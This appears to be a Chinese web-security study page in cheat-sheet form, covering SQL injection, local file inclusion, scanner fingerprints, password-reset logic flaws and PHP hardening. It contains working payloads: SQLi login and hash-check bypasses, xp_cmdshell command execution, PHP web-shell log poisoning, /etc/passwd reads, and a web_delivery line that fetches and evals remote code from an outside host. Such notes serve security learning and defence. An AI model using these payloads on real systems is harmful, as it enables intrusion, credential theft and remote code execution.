<li>因为执行时以mysql用户去执行，所以mysql用户需要有Web目录的写权限</li>
<li>有代码执行位置(可控位置)</li>
</ol>
<h4 id="SQLI单引号’被过滤怎么办"><a href="#SQLI单引号’被过滤怎么办" class="headerlink" title="SQLI单引号’被过滤怎么办"></a>SQLI单引号’被过滤怎么办</h4><pre><code>编码 unicode hex
GBK
`
函数 char

有很多使用字符串的方法，但是这几个方法是一直可用的。使用CHAR()(MS)和CONCAT()(M)来生成没有引号的字符串
0x457578 (M) - 16进制编码的字符串
SELECT 0x457578
这在MySQL中会被当做字符串处理
在MySQL中使用16进制字符串的一个简单方式： SELECT CONCAT(&#39;0x&#39;,HEX(&#39;c:\\boot.ini&#39;))
在MySQL中使用CONCAT()函数： SELECT CONCAT(CHAR(75),CHAR(76),CHAR(77)) (M)
这会返回&#39;KLM&#39;
SELECT CHAR(75)+CHAR(76)+CHAR(77) (S)
这会返回&#39;KLM&#39;

eg:
    M:SELECT LOAD_FILE(0x633A5C626F6F742E696E69)
</code></pre>
<h4 id="绕过登陆界面-SMO"><a href="#绕过登陆界面-SMO" class="headerlink" title="绕过登陆界面(SMO+)"></a>绕过登陆界面(SMO+)</h4><pre><code>SQL注入101式(大概是原文名字吧？),登陆小技巧
admin&#39; --
admin&#39; #
admin&#39;/*
&#39; or 1=1--
&#39; or 1=1#
&#39; or 1=1/*
&#39;) or &#39;1&#39;=&#39;1--
&#39;) or (&#39;1&#39;=&#39;1--
....
以不同的用户登陆 (SM*) &#39; UNION SELECT 1, &#39;anotheruser&#39;, &#39;doesnt matter&#39;, 1--
**旧版本的MySQL不支持union*
</code></pre>
<h4 id="绕过MD5哈希检查的例子-MSP"><a href="#绕过MD5哈希检查的例子-MSP" class="headerlink" title="绕过MD5哈希检查的例子(MSP)"></a>绕过MD5哈希检查的例子(MSP)</h4><pre><code>用户名：admin

密码：1234 &#39; AND 1=0 UNION ALL SELECT &#39;admin&#39;,&#39;81dc9bdb52d04dc20036dbd8313ed055
其中81dc9bdb52d04dc20036dbd8313ed055 = MD5(1234)
</code></pre>
<h4 id="MySQL字符串连接"><a href="#MySQL字符串连接" class="headerlink" title="MySQL字符串连接"></a>MySQL字符串连接</h4><pre><code>+(S)
SELECT login + &#39;-&#39; + password FROM members
|| (*MO)
SELECT login || &#39;-&#39; || password FROM members
*关于MySQL的&quot;||&quot; 这个仅在ANSI模式下的MySQL执行，其他情况下都会当成&#39;逻辑操作符&#39;并返回一个0。更好的做法是使用CONCAT()函数。
CONCAT(str1, str2, str3, ...)(M)
连接参数里的所有字符串 例：SELECT CONCAT(login, password) FROM members
</code></pre>
<h4 id="使用HAVING来探测字段名-S"><a href="#使用HAVING来探测字段名-S" class="headerlink" title="使用HAVING来探测字段名(S)"></a>使用HAVING来探测字段名(S)</h4><pre><code>&#39; HAVING 1=1 --
&#39; GROUP BY table.columnfromerror1 HAVING 1=1 --
&#39; GROUP BY table.columnfromerror1, columnfromerror2 HAVING 1=1 --
……
&#39; GROUP BY table.columnfromerror1, columnfromerror2,columnfromerror(n) HAVING 1=1 --
</code></pre>
<h4 id="在SELECT查询中使用ORDER-BY探测字段数-MSO"><a href="#在SELECT查询中使用ORDER-BY探测字段数-MSO" class="headerlink" title="在SELECT查询中使用ORDER BY探测字段数(MSO+)"></a>在SELECT查询中使用ORDER BY探测字段数(MSO+)</h4><pre><code>通过ORDER BY来探测字段数能够加快union注入的速度。
ORDER BY 1--
ORDER BY 2--
……
ORDER BY N--
一直到它报错为止，最后一个成功的数字就是字段数。
</code></pre>
<h4 id="数据类型、UNION、之类的"><a href="#数据类型、UNION、之类的" class="headerlink" title="数据类型、UNION、之类的"></a>数据类型、UNION、之类的</h4><pre><code>经常给UNION配上ALL使用，因为经常会有相同数值的字段，而缺省情况下UNION都会尝试返回唯一值(records with distinct)
如果你每次查询只能有一条记录，而你不想让原本正常查询的记录占用这宝贵的记录位，你可以使用-1或者根本不存在的值来搞定原查询（前提是注入点在WHERE里）。
在UNION中使用NULL，对于大部分数据类型来说这样都比瞎猜字符串、日期、数字之类的来得强
盲注的时候要小心判断错误是来自应用的还是来自数据库的。因为像ASP.NET就经常会在你使用NULL的时候抛出错误（因为开发者们一般都没想到用户名的框中会出现NULL）
</code></pre>
<h4 id="获取字段类型"><a href="#获取字段类型" class="headerlink" title="获取字段类型"></a>获取字段类型</h4><pre><code>&#39; union select sum(columntofind) from users-- (S)

Microsoft OLE DB Provider for ODBC Drivers error &#39;80040e07&#39; [Microsoft][ODBC SQL Server Driver][SQL Server]The sum or average aggregate operation cannot take a **varchar** data type as an argument. 如果没有返回错误说明字段是数字类型
同样的，你可以使用CAST()和CONVERT()

SELECT * FROM Table1 WHERE id = -1 UNION ALL SELECT null, null, NULL, NULL, convert(image,1), null, null,NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULl, NULL--
11223344) UNION SELECT NULL,NULL,NULL,NULL WHERE 1=2 –-
没报错 - 语法是正确的。 这是MS SQL Server的语法。 继续。
11223344) UNION SELECT 1,NULL,NULL,NULL WHERE 1=2 –-
没报错 – 第一个字段是integer类型。
11223344) UNION SELECT 1,2,NULL,NULL WHERE 1=2 --
报错 – 第二个字段不是integer类型
11223344) UNION SELECT 1,’2’,NULL,NULL WHERE 1=2 –-
没报错 – 第二个字段是string类型。
11223344) UNION SELECT 1,’2’,3,NULL WHERE 1=2 –-
报错 – 第三个字段不是integer
……
Microsoft OLE DB Provider for SQL Server error &#39;80040e07&#39; Explicit conversion from data type int to image is not allowed.

你在遇到union错误之前会先遇到convert()错误，所以先使用convert()再用union
</code></pre>
<h4 id="有用的函数、信息收集、内置程序、大量注入笔记"><a href="#有用的函数、信息收集、内置程序、大量注入笔记" class="headerlink" title="有用的函数、信息收集、内置程序、大量注入笔记"></a>有用的函数、信息收集、内置程序、大量注入笔记</h4><pre><code>--&gt;@@version(MS)
数据库的版本。这是个常量，你能把它当做字段来SELECT，而且不需要提供表名。同样的你也可以用在INSERT/UPDATE语句里面，甚至是函数里面。

INSERT INTO members(id, user, pass) VALUES(1, &#39;&#39;+SUBSTRING(@@version,1,10) ,10)

--&gt;文件插入(Bulk Insert)(S)

把文件内容插入到表中。如果你不知道应用目录你可以去读取IIS metabase file(仅IIS 6)(%systemroot%\system32\inetsrv\MetaBase.xml)然后在里面找到应用目录。

新建一个表foo(line varchar(8000))
BULK INSERT foo FROM &#39;c:\inetpub\wwwroot\login.asp&#39;
DROP了临时表，重复另一个文件

--&gt;BCP(S)

写入文件。这个功能需要登录 bcp &quot;SELECT * FROM test..foo&quot; queryout c:\inetpub\wwwroot\runcommand.asp -c -Slocalhost -Usa -Pfoobar

--&gt;SQL Server的VBS/WSH(S)

由于ActiveX的支持，你能在SQL Server中使用VBS/WSH

declare @o int exec sp_oacreate &#39;wscript.shell&#39;, @o out exec sp_oamethod @o, &#39;run&#39;, NULL, &#39;notepad.exe&#39;

Username: &#39;; declare @o int exec sp_oacreate &#39;wscript.shell&#39;, @o out exec sp_oamethod @o, &#39;run&#39;, NULL, &#39;notepad.exe&#39; --

--&gt;执行系统命令，xp_cmdshell(S)

众所周知的技巧，SQL Server 2005默认是关闭的。你需要admin权限

EXEC master.dbo.xp_cmdshell &#39;cmd.exe dir c:&#39;

用ping简单的测试一下，用之前先检查一下防火墙和嗅探器。

EXEC master.dbo.xp_cmdshell &#39;ping &#39;

如果有错误，或者union或者其他的什么，你都不能直接读到结果。

--&gt;SQL Server中的一些特殊的表(S)

Error Messages

master..sysmessages

Linked Servers

master..sysservers

Password (2000和2005版本的都能被破解，这俩的加密算法很相似)

SQL Server 2000: masters..sysxlogins

SQL Server 2005 : sys.sql_logins

--&gt;SQL Server的其它内置程序(S)

命令执行 (xp_cmdshell)

exec master..xp_cmdshell &#39;dir&#39;

注册表操作 (xp_regread)

xp_regaddmultistring
xp_regdeletekey
xp_regdeletevalue
xp_regenumkeys
xp_regenumvalues
xp_regread
xp_regremovemultistring
xp_regwrite

exec xp_regread HKEY_LOCAL_MACHINE, &#39;SYSTEM\CurrentControlSet \Services\lanmanserver\parameters&#39;, &#39;nullsessionshares&#39; exec xp_regenumvalues HKEY_LOCAL_MACHINE, &#39;SYSTEM \CurrentControlSet \Services\snmp\parameters\validcommunities&#39;

管理服务(xp_servicecontrol)

媒体(xp_availablemedia)

ODBC 资源 (xp_enumdsn)

登录 (xp_loginconfig)
创建Cab文件 (xp_makecab)
域名列举 (xp_ntsec_enumdomains)
杀进程 (need PID) (xp_terminate_process)

新建进程 (实际上你想干嘛都行)

sp_addextendedproc ‘xp_webserver’, ‘c:\temp\x.dll’ exec xp_webserver

写文件进UNC或者内部路径 (sp_makewebtask)
</code></pre>
<h4 id="宽字节注入原理，在哪里编码，如何防范"><a href="#宽字节注入原理，在哪里编码，如何防范" class="headerlink" title="宽字节注入原理，在哪里编码，如何防范"></a>宽字节注入原理，在哪里编码，如何防范</h4><ol>
<li>GBK的php， Addslashes在’前加了0x5c与前一个字节拼接成了一个字，导致0x27落单</li>
<li>MySQL存储的字符集 字段&gt;表&gt;库&gt;服务器</li>
<li>PHP作为客户端连接MySQL时，这个字符集就是PHP文件默认的编码</li>
<li>character_set_client和character_set_connection不同导致问题</li>
</ol>
<blockquote>
<p>指定三个字符集（客户端、连接层、结果集）都是GBK编码%df%27-&gt;(addslashes)-&gt;%df%5c%27-&gt;(GBK)-&gt;运’</p>
<p>使用set names UTF-8指定了UTF-8字符集，并且也使用转义函数进行转义。有时候，为了避免乱码，会将一些用户提交的GBK字符使用iconv函数（或者mb_convert_encoding）先转为UTF-8，然后再拼接入SQL语句 e55c27====(addslashes)====&gt;e55c5c5c27====(iconv)====&gt;e98ca65c5c27 (e55c转为UTF-8为e98ca6)</p>
<p>使用iconv进行字符集转换，将UTF-8转为GBK，同时，set names字符集为GBK。提交%e9%8c%a6即可。<br>这个情景的大前提是先编码后转义: e98ca6====(iconv)=====&gt;e55c=====(addslashes)====&gt;e55c5c</p>
</blockquote>
<pre><code>修复
（1）使用mysql_set_charset(GBK)指定字符集
（2）使用mysql_real_escape_string进行转义
mysql_real_escape_string与addslashes的不同之处在于其会考虑当前设置的字符集，不会出现前面e5和5c拼接为一个宽字节的问题，但是这个“当前字符集”如何确定呢？
就是使用mysql_set_charset进行指定。
上述的两个条件是“与”运算的关系，少一条都不行
</code></pre>
<blockquote>
<p>gb2312编码的取值范围。它的高位范围是0xA1<del>0xF7，低位范围是0xA1</del>0xFE，而\是0x5c</p>
</blockquote>
<blockquote>
<p>解决：character_set_client设置为binary（二进制)</p>
</blockquote>
<h4 id="SQLI中update怎么利用"><a href="#SQLI中update怎么利用" class="headerlink" title="SQLI中update怎么利用"></a>SQLI中update怎么利用</h4><ol>
<li>left join</li>
</ol>
<h4 id="SQLI绕过WAF思路"><a href="#SQLI绕过WAF思路" class="headerlink" title="SQLI绕过WAF思路"></a>SQLI绕过WAF思路</h4><pre><code>1. 大小写混合
2. 替换关键字 (一次正则)
3. 使用编码(URL编码/十六进制编码/Unicode编码/)
4. 使用注释(//, -- , /**/, #, --+,--  -, ;，--a),内联注释/!**/只有MySQL能识别
5. 等价函数与命令()
6. 特殊符号 `(+-.可作连接,@定义变量,)
7. HTTP参数控制(HPP)
8. 缓冲区溢出
</code></pre>
<h4 id="MySQL有哪些表，有什么用"><a href="#MySQL有哪些表，有什么用" class="headerlink" title="MySQL有哪些表，有什么用"></a>MySQL有哪些表，有什么用</h4><blockquote>
<p>mysql库</p>
</blockquote>
<ol>
<li>user：</li>
<li>db：</li>
<li>table_priv:</li>
<li>columns_priv:</li>
</ol>
<p>user表身份： Host + User + Password</p>
<p>权限：user-all &gt; db &gt; tables_priv &gt; columns_priv</p>
<p>插件 plugin</p>
<blockquote>
<p>两个视图库</p>
</blockquote>
<ol>
<li>information_schema</li>
<li>performance_schema</li>
</ol>
<h4 id="SQL注入防御"><a href="#SQL注入防御" class="headerlink" title="SQL注入防御"></a>SQL注入防御</h4><ol>
<li>只要是有固定格式的变量，在SQL语句执行前，应该严格按照固定格式去检查，确保变量是我们预想的格式</li>
<li>过滤特殊符号</li>
<li>绑定变量，使用预编译语句</li>
</ol>
<h3 id="LFI"><a href="#LFI" class="headerlink" title="LFI"></a>LFI</h3><h4 id="LFI姿势"><a href="#LFI姿势" class="headerlink" title="LFI姿势"></a>LFI姿势</h4><blockquote>
<p><a target="_blank" rel="noopener" href="http://192.168.1.101/bWAPP/rlfi.php?language=lang_en.php&amp;action=go">http://192.168.1.101/bWAPP/rlfi.php?language=lang_en.php&amp;action=go</a> into 192.168.1.101/bWAPP/flfi.php?language=/etc/passwd</p>
<p>%00 ?</p>
<p>4096</p>
<p><a target="_blank" rel="noopener" href="http://192.168.1.101/bWAPP/rlfi.php?language=php://filter/read=convert.base64-encode/resource=/etc/passwd">http://192.168.1.101/bWAPP/rlfi.php?language=php://filter/read=convert.base64-encode/resource=/etc/passwd</a><br><a target="_blank" rel="noopener" href="http://192.168.1.101/bWAPP/rlfi.php?language=php://input&amp;cmd=ls">http://192.168.1.101/bWAPP/rlfi.php?language=php://input&amp;cmd=ls</a></p>
</blockquote>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;？php system（$ _ GET [<span class="string">&#x27;cmd&#x27;</span>]）; ？&gt;</span><br></pre></td></tr></table></figure>

<blockquote>
<p>use exploit/multi/script/web_delivery, 使用set payload windows/meterpreter/reverse_tcp，php的cmd=php -d allow_url_fopen=true -r “eval(file_get_contents(‘<a target="_blank" rel="noopener" href="http://192.168.0.104:8081/xxxxx&#39;))&quot;">http://192.168.0.104:8081/xxxxx&#39;))&quot;</a>;</p>
</blockquote>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;？php system（$ _ GET [<span class="string">&#x27;cmd&#x27;</span>]）; ？&gt;</span><br></pre></td></tr></table></figure>

<blockquote>
<p><a target="_blank" rel="noopener" href="http://192.168.1.102/dvwa/vulnerabilities/fi/?page=proc/self/environ">http://192.168.1.102/dvwa/vulnerabilities/fi/?page=proc/self/environ</a></p>
</blockquote>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Useragent: &lt;？php system（$ _ GET [<span class="string">&#x27;cmd&#x27;</span>]）; ？&gt;</span><br></pre></td></tr></table></figure>
<blockquote>
<p>然后访问192.168.1.8/lfi/lfi.php?file=/var/www/apachae2/access.log&amp;cmd=id</p>
</blockquote>
<h3 id="指纹"><a href="#指纹" class="headerlink" title="指纹"></a>指纹</h3><h4 id="Web指纹有哪些"><a href="#Web指纹有哪些" class="headerlink" title="Web指纹有哪些"></a>Web指纹有哪些</h4><ol>
<li>API：Wappalyzer API</li>
<li>页面关键字 Powered by</li>
<li>特殊文件名/文件hash/robots</li>
<li>文件标签结构</li>
<li>response</li>
</ol>
<h4 id="如何获取大量指纹信息"><a href="#如何获取大量指纹信息" class="headerlink" title="如何获取大量指纹信息"></a>如何获取大量指纹信息</h4><ol>
<li>开源API</li>
<li>爬虫</li>
</ol>
<h4 id="指纹擦除"><a href="#指纹擦除" class="headerlink" title="指纹擦除"></a>指纹擦除</h4><ol>
<li>burp : Proxy——&gt;Options”中的“Match and Replace</li>
</ol>
<h4 id="工具扫描器具有的指纹信息"><a href="#工具扫描器具有的指纹信息" class="headerlink" title="工具扫描器具有的指纹信息"></a>工具扫描器具有的指纹信息</h4><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line">Acunetix Web Vulnerability Scanner：</span><br><span class="line">        http headers:</span><br><span class="line">            Acunetix-Aspect</span><br><span class="line">            Acunetix-Aspect-Password</span><br><span class="line">            Acunetix-Aspect-Queries</span><br><span class="line">        params:</span><br><span class="line">            acunetix_wvs_security_test</span><br><span class="line">        url:</span><br><span class="line">            /acunetix-wvs-test-<span class="keyword">for</span>-some-inexistent-file</span><br><span class="line">        cookie params:</span><br><span class="line">            acunetixCookie</span><br><span class="line">    HP WebInspect:</span><br><span class="line">        http headers:</span><br><span class="line">            X-WIPP</span><br><span class="line">            X-RequestManager-Memo</span><br><span class="line">            X-Request-Memo</span><br><span class="line">            X-Scan-Memo</span><br><span class="line">        cookie params:</span><br><span class="line">            CustomCookie</span><br><span class="line">    Netsparker:</span><br><span class="line">        params:</span><br><span class="line">            netsparker</span><br></pre></td></tr></table></figure>

<h3 id="逻辑漏洞"><a href="#逻辑漏洞" class="headerlink" title="逻辑漏洞"></a>逻辑漏洞</h3><h4 id="测试一般流程"><a href="#测试一般流程" class="headerlink" title="测试一般流程"></a>测试一般流程</h4><ol>
<li>首先尝试正常密码找回流程，选择不同找回方式，记录所有数据包</li>
<li>分析数据包，找到敏感部分</li>
<li>分析后台找回机制所采用的验证手段</li>
<li>修改数据包验证推测</li>
</ol>
<h4 id="身份认证"><a href="#身份认证" class="headerlink" title="身份认证"></a>身份认证</h4><ol>
<li>暴力破解/弱加密/固定phpsessid/可破解cookie</li>
</ol>
<h4 id="业务一致性"><a href="#业务一致性" class="headerlink" title="业务一致性"></a>业务一致性</h4><ol>
<li>手机号/id/邮箱/订单号篡改</li>
</ol>
<h4 id="业务数据篡改"><a href="#业务数据篡改" class="headerlink" title="业务数据篡改"></a>业务数据篡改</h4><ol>
<li>金额/商品数量/数量限制/js修改</li>
</ol>
<h4 id="业务授权"><a href="#业务授权" class="headerlink" title="业务授权"></a>业务授权</h4><ol>
<li>未授权访问/越权访问</li>
</ol>
<h4 id="用户凭证暴力破解"><a href="#用户凭证暴力破解" class="headerlink" title="用户凭证暴力破解"></a>用户凭证暴力破解</h4><ol>
<li>纯数字验证(4/6位)不失效和限制次数</li>
</ol>
<h4 id="返回凭证"><a href="#返回凭证" class="headerlink" title="返回凭证"></a>返回凭证</h4><ol>
<li>url返回验证码及token</li>
</ol>
<h4 id="密码找回凭证在页面中"><a href="#密码找回凭证在页面中" class="headerlink" title="密码找回凭证在页面中"></a>密码找回凭证在页面中</h4><h4 id="返回短信验证码"><a href="#返回短信验证码" class="headerlink" title="返回短信验证码"></a>返回短信验证码</h4><h4 id="邮箱弱token"><a href="#邮箱弱token" class="headerlink" title="邮箱弱token"></a>邮箱弱token</h4><ol>
<li>时间戳md5</li>
</ol>
<h4 id="用户名-amp-服务器时间"><a href="#用户名-amp-服务器时间" class="headerlink" title="用户名 &amp; 服务器时间"></a>用户名 &amp; 服务器时间</h4><ol>
<li>在重置密码链接改用户名</li>
</ol>
<h4 id="用户凭证有效性"><a href="#用户凭证有效性" class="headerlink" title="用户凭证有效性"></a>用户凭证有效性</h4><ol>
<li>验证码和手机号未关联</li>
<li>邮件中的username未验证</li>
<li>步骤缺乏中间验证</li>
</ol>
<h4 id="邮箱token"><a href="#邮箱token" class="headerlink" title="邮箱token"></a>邮箱token</h4><ol>
<li>没起关联作用</li>
</ol>
<h4 id="重置密码token"><a href="#重置密码token" class="headerlink" title="重置密码token"></a>重置密码token</h4><ol>
<li>token绑定问题</li>
</ol>
<h4 id="重新绑定"><a href="#重新绑定" class="headerlink" title="重新绑定"></a>重新绑定</h4><ol>
<li>越权绑定手机号</li>
</ol>
<h4 id="邮箱绑定"><a href="#邮箱绑定" class="headerlink" title="邮箱绑定"></a>邮箱绑定</h4><ol>
<li>更改找回密码页面uid导致此id被自己的忘记密码机制修改</li>
</ol>
<h4 id="服务器验证"><a href="#服务器验证" class="headerlink" title="服务器验证"></a>服务器验证</h4><ol>
<li>最终提交时客户端确定了uid</li>
</ol>
<h4 id="服务器验证可控内容"><a href="#服务器验证可控内容" class="headerlink" title="服务器验证可控内容"></a>服务器验证可控内容</h4><ol>
<li>cookie内的id</li>
<li>网页返回了密文</li>
</ol>
<h4 id="服务器验证验证逻辑为空"><a href="#服务器验证验证逻辑为空" class="headerlink" title="服务器验证验证逻辑为空"></a>服务器验证验证逻辑为空</h4><ol>
<li>验证信息永真</li>
</ol>
<h4 id="用户身份验证"><a href="#用户身份验证" class="headerlink" title="用户身份验证"></a>用户身份验证</h4><ol>
<li>验证码和手机号没绑定</li>
</ol>
<h4 id="账号与邮箱账号的绑定"><a href="#账号与邮箱账号的绑定" class="headerlink" title="账号与邮箱账号的绑定"></a>账号与邮箱账号的绑定</h4><ol>
<li>重新发送邮件未做绑定验证</li>
</ol>
<h4 id="找回步骤"><a href="#找回步骤" class="headerlink" title="找回步骤"></a>找回步骤</h4><ol>
<li>跳过验证步骤、找回方式，直接到设置新密码页面</li>
</ol>
<h4 id="本地验证"><a href="#本地验证" class="headerlink" title="本地验证"></a>本地验证</h4><ol>
<li>在本地验证服务器的返回信息，确定是否执行重置密码，但是其返回信息是可控的内容，或者可以得到的内容</li>
</ol>
<h4 id="发送短信等验证信息的动作在本地进行，可以通过修改返回包进行控制"><a href="#发送短信等验证信息的动作在本地进行，可以通过修改返回包进行控制" class="headerlink" title="发送短信等验证信息的动作在本地进行，可以通过修改返回包进行控制"></a>发送短信等验证信息的动作在本地进行，可以通过修改返回包进行控制</h4><h4 id="注入"><a href="#注入" class="headerlink" title="注入"></a>注入</h4><ol>
<li>username</li>
</ol>
<h4 id="Token生成"><a href="#Token生成" class="headerlink" title="Token生成"></a>Token生成</h4><ol>
<li>找回密码token被其他人使用</li>
</ol>
<h4 id="注册覆盖"><a href="#注册覆盖" class="headerlink" title="注册覆盖"></a>注册覆盖</h4><h4 id="session覆盖"><a href="#session覆盖" class="headerlink" title="session覆盖"></a>session覆盖</h4><ol>
<li>第一个找回密码链接可以覆盖同浏览器第二个找回密码请求</li>
</ol>
<h3 id="HTML5"><a href="#HTML5" class="headerlink" title="HTML5"></a>HTML5</h3><h4 id="HTML5安全"><a href="#HTML5安全" class="headerlink" title="HTML5安全"></a>HTML5安全</h4><ol>
<li><code>&lt;iframe sandbox&gt;</code> 独立同源策略: 不允许脚本执行、表单提交、插件加载、访问其他浏览对象</li>
<li><code>&lt;video onloadedmetdata=&#39;&#39; ondurationchanged=&#39;&#39; ontimeupdate=&#39;&#39;&gt; &lt;/video&gt;</code></li>
<li><code>&lt;a rel=&#39;noreferrer&#39;&gt;</code> 同样还有<code>&lt;area&gt;</code></li>
<li>HTTP Headers: Origin</li>
<li>postMessage(绕过sandbox)</li>
<li>Web Storage(存xss payload)</li>
</ol>
<h4 id="HTML5的新安全策略"><a href="#HTML5的新安全策略" class="headerlink" title="HTML5的新安全策略"></a>HTML5的新安全策略</h4><h3 id="扫描器"><a href="#扫描器" class="headerlink" title="扫描器"></a>扫描器</h3><h4 id="扫描器扫不出来的漏洞"><a href="#扫描器扫不出来的漏洞" class="headerlink" title="扫描器扫不出来的漏洞"></a>扫描器扫不出来的漏洞</h4><ol>
<li>逻辑漏洞等需要人为参与的</li>
<li>无法绕过的验证措施</li>
</ol>
<h4 id="xssFuzzing"><a href="#xssFuzzing" class="headerlink" title="xssFuzzing"></a>xssFuzzing</h4><h4 id="如何做扫描器"><a href="#如何做扫描器" class="headerlink" title="如何做扫描器"></a>如何做扫描器</h4><h4 id="创宇、wooyun等扫描器的原理，为什么这么设计"><a href="#创宇、wooyun等扫描器的原理，为什么这么设计" class="headerlink" title="创宇、wooyun等扫描器的原理，为什么这么设计"></a>创宇、wooyun等扫描器的原理，为什么这么设计</h4><h3 id="整体思路"><a href="#整体思路" class="headerlink" title="整体思路"></a>整体思路</h3><h4 id="企业安全应急响应中，如何获取APP指纹"><a href="#企业安全应急响应中，如何获取APP指纹" class="headerlink" title="企业安全应急响应中，如何获取APP指纹"></a>企业安全应急响应中，如何获取APP指纹</h4><h4 id="如何日掉一个网站，思路"><a href="#如何日掉一个网站，思路" class="headerlink" title="如何日掉一个网站，思路"></a>如何日掉一个网站，思路</h4><h4 id="如何进行代码审计"><a href="#如何进行代码审计" class="headerlink" title="如何进行代码审计"></a>如何进行代码审计</h4><h4 id="只有后台如何渗透"><a href="#只有后台如何渗透" class="headerlink" title="只有后台如何渗透"></a>只有后台如何渗透</h4><h4 id="如何社工一个企业的员工信息"><a href="#如何社工一个企业的员工信息" class="headerlink" title="如何社工一个企业的员工信息"></a>如何社工一个企业的员工信息</h4><h4 id="如何获得一个域名的邮箱列表"><a href="#如何获得一个域名的邮箱列表" class="headerlink" title="如何获得一个域名的邮箱列表"></a>如何获得一个域名的邮箱列表</h4><h4 id="WebServer最重要的是什么-流程"><a href="#WebServer最重要的是什么-流程" class="headerlink" title="WebServer最重要的是什么/流程"></a>WebServer最重要的是什么/流程</h4><h4 id="企业安全"><a href="#企业安全" class="headerlink" title="企业安全"></a>企业安全</h4><h4 id="追踪溯源"><a href="#追踪溯源" class="headerlink" title="追踪溯源"></a>追踪溯源</h4><h4 id="给写PHP的人安全建议"><a href="#给写PHP的人安全建议" class="headerlink" title="给写PHP的人安全建议"></a>给写PHP的人安全建议</h4><ol>
<li>不要反序列化任何用户数据</li>
<li>不要使用==</li>
<li>display_error = Off</li>
</ol>
<h4 id="PHP安全建议"><a href="#PHP安全建议" class="headerlink" title="PHP安全建议"></a>PHP安全建议</h4><ol>
<li>绝不要信任外部数据或输入</li>
<li>用户输入进行清理的一个简单方法是，使用正则表达式来处理它(规则长度)</li>
<li>禁用那些使安全性难以实施的 PHP设置: register_globals</li>
<li>如果不能理解它, 就不能保护它</li>
<li>使用预编译(php 5.3.6以前版本中，并不支持DSN中的charset选项，所有绑定的变量均是以ascii字节进行转义的)，使用mysql_real_escape_string()(5.5)</li>
<li>使用is_numeric()</li>
<li>检查用户输入长度</li>
<li>防止十六进制字符串</li>
<li>从用户输入中清除 HTML 标记</li>
<li>token、验证码</li>
<li>使用filter_var和filter_input等过滤器</li>
<li>打开/etc/php.ini文件, 查找到 disable_functions, 添加需禁用的函数名, 如下:<br>phpinfo,passthru,exec,system,chroot,scandir,chgrp,chown,shell_exec,proc_open,proc_get_status</li>
<li>数据库子集 utf8mb4</li>
</ol>
<h4 id="如何知道WAF信息"><a href="#如何知道WAF信息" class="headerlink" title="如何知道WAF信息"></a>如何知道WAF信息</h4><ol>
<li>Cookie值</li>
<li>HTTP 响应头</li>
<li><pre><code>HTML特殊字符串
</code></pre>
</li>
<li>特定src引用</li>
<li>404/200页</li>
</ol>
<h4 id="如何收集子域名"><a href="#如何收集子域名" class="headerlink" title="如何收集子域名"></a>如何收集子域名</h4><ol>
<li>枚举，A记录对比</li>
<li>DNS查询</li>
<li>循环爆破</li>
<li>前缀后缀处理</li>
<li>SSL证书</li>
<li>网站爬虫</li>
<li>域传送漏洞</li>
<li>搜索引擎</li>
<li>crossdomain.xml</li>
<li>IP反查</li>
</ol>
<blockquote>
<p>防御</p>
</blockquote>
<ol>
<li>泛解析？</li>
</ol>
<h3 id="协议"><a href="#协议" class="headerlink" title="协议"></a>协议</h3><h4 id="同源策略，为什么有它"><a href="#同源策略，为什么有它" class="headerlink" title="同源策略，为什么有它"></a>同源策略，为什么有它</h4><ol>
<li>同协议端口域名</li>
<li>保护当前网站资源和数据</li>
</ol>
<h4 id="WebSocket"><a href="#WebSocket" class="headerlink" title="WebSocket"></a>WebSocket</h4><h4 id="DNS协议在哪一层，什么时候用TCP"><a href="#DNS协议在哪一层，什么时候用TCP" class="headerlink" title="DNS协议在哪一层，什么时候用TCP"></a>DNS协议在哪一层，什么时候用TCP</h4><ol>
<li>应用层</li>
<li>区域传送TCP、UDP最长512字节,使用TCP、同步(大量数据)</li>
</ol>
<h4 id="网络协议脆弱性"><a href="#网络协议脆弱性" class="headerlink" title="网络协议脆弱性"></a>网络协议脆弱性</h4><p><a target="_blank" rel="noopener" href="http://kjgcdx.ijournal.cn/ch/reader/create_pdf.aspx?file_no=20020414&year_id=2002&quarter_id=4&falg=1">PDF</a></p>
<blockquote>
<p>TCP/IP</p>
</blockquote>
<ol>
<li>不能提供可靠的身份验证(三次握手提供可靠连接)</li>
<li>不能有效防止信息泄漏(窃听)</li>
<li>没有提供可靠的信息完整性验证手段(算法不够完整)</li>
<li>协议没有手段控制资源占用和分配(SYN flood、DoS)</li>
</ol>
<blockquote>
<p>TCP/IP</p>
</blockquote>
<ol>
<li>IP 欺骗(攻击者首先要便被假冒的主机对目标主机发来的数据包不做响应,SYN),猜测序列号</li>
<li>TCP 会话劫持(认证后猜测序列号)</li>
<li>拒绝服务(SYN Flood)</li>
<li>ping溢出</li>
<li>RST/FIN</li>
</ol>
<h4 id="TCP-UDP区别-如何做可靠性连接-为什么"><a href="#TCP-UDP区别-如何做可靠性连接-为什么" class="headerlink" title="TCP/UDP区别 如何做可靠性连接 为什么"></a>TCP/UDP区别 如何做可靠性连接 为什么</h4><ol>
<li><p>TCP慢、可靠、面向连接、大量数据传送，UDP反之</p>
</li>
<li><p>确认和重传：接收方收到报文就会确认，发送方发送一段时间后没有收到确认就重传。</p>
</li>
<li><p>数据校验</p>
</li>
<li><p>数据合理分片和排序：</p>
<p> UDP：IP数据报大于1500字节,大于MTU.这个时候发送方IP层就需要分片(fragmentation).把数据报分成若干片,使每一片都小于MTU.而接收方IP层则需要进行数据报的重组.这样就会多做许多事情,而更严重的是,由于UDP的特性,当某一片数据传送中丢失时,接收方便无法重组数据报.将导致丢弃整个UDP数据报.</p>
